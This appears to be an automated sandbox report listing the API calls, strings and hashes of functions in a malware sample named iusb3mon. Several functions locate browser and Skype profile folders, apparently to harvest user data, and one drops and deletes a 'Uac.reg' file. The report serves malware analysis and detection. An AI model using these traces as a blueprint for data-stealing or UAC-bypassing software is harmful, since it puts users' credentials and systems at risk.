Instruction ID: 9f73c37720f1fc09658fdbb9f544a7af90ed580a0c6e751bcc312456eb8ae65e
Opcode Fuzzy Hash: 5827da9754a5482bc07b818a1341b52beae33212721349f78306913690a55790
Instruction Fuzzy Hash: AE118671D60309EBDB85EBE0DD4AFEEB7B8AF14700F104155EA61B21C0DBB85B048B61

Function 06294AE3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06294AE8

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06294B16

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?), ref: 06294B72

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

SogouExplorer.exe, xrefs: 06294AF9
\AppData\Roaming\SogouExplorer, xrefs: 06294B4E
C:\Users\, xrefs: 06294B43

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
API String ID: 12226711-2055279553
Opcode ID: 25a8ff57ff46ee422b1da1b134a805af9f292eed75285a25bded5154f39490b5
Instruction ID: 3e5a31fd9fb05f2cf505262116233bc3332b53e7fcfbd6d2417e0e9b1f4e676b
Opcode Fuzzy Hash: 25a8ff57ff46ee422b1da1b134a805af9f292eed75285a25bded5154f39490b5
Instruction Fuzzy Hash: 5E118671D60319EBDB85EBE0DD4AFEEB7B8AF14700F104155EA61B21C0DBB85B048B65

Function 06294BA9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06294BAE

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06294BDC

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06294C38

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

\AppData\Local\Google\Chrome\User Data\Default, xrefs: 06294C14
C:\Users\, xrefs: 06294C09
chrome.exe, xrefs: 06294BBF

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: 73c8afcc5df000429a31ade73f5826ea89c1dc0283f7181879766bda51fc99ff
Instruction ID: 87bbc7673b7683c445589efd4ac35d793f474366eba67940968b27063a3aa011
Opcode Fuzzy Hash: 73c8afcc5df000429a31ade73f5826ea89c1dc0283f7181879766bda51fc99ff
Instruction Fuzzy Hash: 8B116372D60319EBDB85EBE0DD4AFEEB7B8AF14700F104155AA61B21C0DBB85B048B61

Function 0629485C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06294861

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0629488F

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?), ref: 062948EB

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

\AppData\Roaming\Microsoft\Skype for Desktop, xrefs: 062948C7
C:\Users\, xrefs: 062948BC
Skype.exe, xrefs: 06294872

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
API String ID: 12226711-3499480952
Opcode ID: eddc75ae884e5d5f6e230d87ce74556b17aa1d76de836d91079aae4193f0e5e2
Instruction ID: d63b53c90a4a266c935ca4d83fb2941bfddc902564d294a86bc9f701d8f37ae0
Opcode Fuzzy Hash: eddc75ae884e5d5f6e230d87ce74556b17aa1d76de836d91079aae4193f0e5e2
Instruction Fuzzy Hash: 37118671D60309EBDB85EBE0DD4AFEEB7B8AF14700F104155AA61B21C0DBB85B048B61

Function 06294957 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0629495C

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0629498A

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?), ref: 062949E6

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

360se6.exe, xrefs: 0629496D
\AppData\Roaming\360se6\User Data\Default, xrefs: 062949C2
C:\Users\, xrefs: 062949B7

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
API String ID: 12226711-1244823433
Opcode ID: c20a7e9ced7fa534ba36a924c15427208783b5156d3d8bc7a5dbe1d55e137f9d
Instruction ID: f11246ed7356902c2729e9ac8a55ce30b3c11364b722615085705243cea8ceee
Opcode Fuzzy Hash: c20a7e9ced7fa534ba36a924c15427208783b5156d3d8bc7a5dbe1d55e137f9d
Instruction Fuzzy Hash: 45116371D60309EBDB85EBE0DD4AFEEBBB8AF14700F104155EA61B21C0DBB85B048B61

Function 06293C01 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06293C3D
CopyFileA.KERNEL32(?,?,00000000), ref: 06293C53

Part of subcall function 06293BBA: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 06293BD0
Part of subcall function 06293BBA: WriteFile.KERNEL32(00000000,062B5588,000000F5,?,00000000), ref: 06293BE8
Part of subcall function 06293BBA: CloseHandle.KERNEL32(00000000), ref: 06293BF5

Sleep.KERNEL32(?), ref: 06293C72
Sleep.KERNEL32(000003E8), ref: 06293C79
DeleteFileA.KERNEL32(Uac.reg), ref: 06293C80

Strings

Uac.reg, xrefs: 06293C0A, 06293C7B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
String ID: Uac.reg
API String ID: 3965208581-763348774
Opcode ID: 152f2578e90450c4fb9f33e77fb505181adf4196352f8e4f283f138b58b78d73
Instruction ID: fba42048c6ad69bb2381beafc957536ec451a062754ef06bda470b8a6c1625a3
Opcode Fuzzy Hash: 152f2578e90450c4fb9f33e77fb505181adf4196352f8e4f283f138b58b78d73
Instruction Fuzzy Hash: D70162729003199BEB60DFA4EC4DFCE7BBDEB44310F0001A6E784E6180DAB05685CF51

Function 062AB5EE Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 062AB5FA
GetSysColor.USER32(00000010), ref: 062AB601
GetSysColor.USER32(00000014), ref: 062AB608
GetSysColor.USER32(00000012), ref: 062AB60F
GetSysColor.USER32(00000006), ref: 062AB616
GetSysColorBrush.USER32(0000000F), ref: 062AB623
GetSysColorBrush.USER32(00000006), ref: 062AB62A

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: c64752f69d280f25c12084c705d32f47ee7719c0ef373e86b2b067b236af3134
Instruction ID: 85ca55dd4e64a9372a4c85f4cdf16ba1e8edb217df710982775a7309bc04bc48
Opcode Fuzzy Hash: c64752f69d280f25c12084c705d32f47ee7719c0ef373e86b2b067b236af3134
Instruction Fuzzy Hash: 8CF0F8719407489BD720AF729909B47BAE1FFC4B10F02092EE6858BA90E6B5A4019F40

Function 00345674 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,003687D3,?,?,bad locale name), ref: 003456BD
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,003687D3,?,?,bad locale name), ref: 00345728
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,003687D3,?,?,bad locale name), ref: 00345745
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,003687D3,?,?,bad locale name), ref: 00345784
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,003687D3,?,?,bad locale name), ref: 003457E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,003687D3,?,?,bad locale name), ref: 00345806

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 02936d55f5390622c1bbb0963fac19d508239df3f2bc7fbd6091dc9bdb358f9f
Instruction ID: 9db63fe89165d6d21626c7d5f4cdfc117a321f5d0004a9bdaf4644ba8cfcc33d
Opcode Fuzzy Hash: 02936d55f5390622c1bbb0963fac19d508239df3f2bc7fbd6091dc9bdb358f9f
Instruction Fuzzy Hash: D0519172A1060AEFEB225F61CC41FAA7BE9EF44750F164425F905DF1A1DB74AD10CBA0

Function 00342DE0 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00342E36
std::_Lockit::_Lockit.LIBCPMT ref: 00342E58
std::_Lockit::~_Lockit.LIBCPMT ref: 00342E78
std::_Facet_Register.LIBCPMT ref: 00342EE5
std::_Lockit::~_Lockit.LIBCPMT ref: 00342F01
Concurrency::cancel_current_task.LIBCPMT ref: 00342F61

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 03be38bb0cf07f58ae87166d1658c4c86d633fcde4ab049f856ac61ea7bf59f5
Instruction ID: 989ba3879a05a9f687dc54f06df05b617b6472bda7ff9baa424abcb985b9c0e4
Opcode Fuzzy Hash: 03be38bb0cf07f58ae87166d1658c4c86d633fcde4ab049f856ac61ea7bf59f5
Instruction Fuzzy Hash: AA515875A00214DFCB12DF98D884AAEBBF4EB08720F154199E855AF391DB70BE45CBA1

Function 062A1CDF Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,062AE7F0,00000001,?,7622E860,062C893C,?,?,00000002,00000000,?,?,062A3769,?), ref: 062A1D1E
GetStringTypeA.KERNEL32(00000000,00000001,062C6150,00000001,?,?,?,062A3769,?), ref: 062A1D38
GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,7622E860,062C893C,?,?,00000002,00000000,?,?,062A3769,?), ref: 062A1D6C
MultiByteToWideChar.KERNEL32(?,062C893D,?,00000000,00000000,00000000,7622E860,062C893C,?,?,00000002,00000000,?,?,062A3769,?), ref: 062A1DA4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 062A1DFA
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 062A1E0C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 8e88a401c5e675e6cd7bf046597c7296d5e23bb77442c3c6e62baace760c2f2d
Instruction ID: a19dffda4bde1762e0430d6114312be327def4ba70cf67047336470b5c6e0cc7
Opcode Fuzzy Hash: 8e88a401c5e675e6cd7bf046597c7296d5e23bb77442c3c6e62baace760c2f2d
Instruction Fuzzy Hash: 56419E7192031AAFDF508F94DC89EEE7BBAFB08760F144419FE11D6240C3B58861DBA0

Function 062AC729 Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,062C6588,00000000,?,00000000,?,062AC89F,062C6588,00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773), ref: 062AC734
EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,062AC89F,062C6588,00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?), ref: 062AC783
LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,062AC89F,062C6588,00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?), ref: 062AC796
LocalAlloc.KERNEL32(00000000,?,?,00000000,?,062AC89F,062C6588,00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?), ref: 062AC7AC
LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,062AC89F,062C6588,00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773), ref: 062AC7BE
TlsSetValue.KERNEL32(00000000,00000000,00000100), ref: 062AC7FA

Memory Dump Source

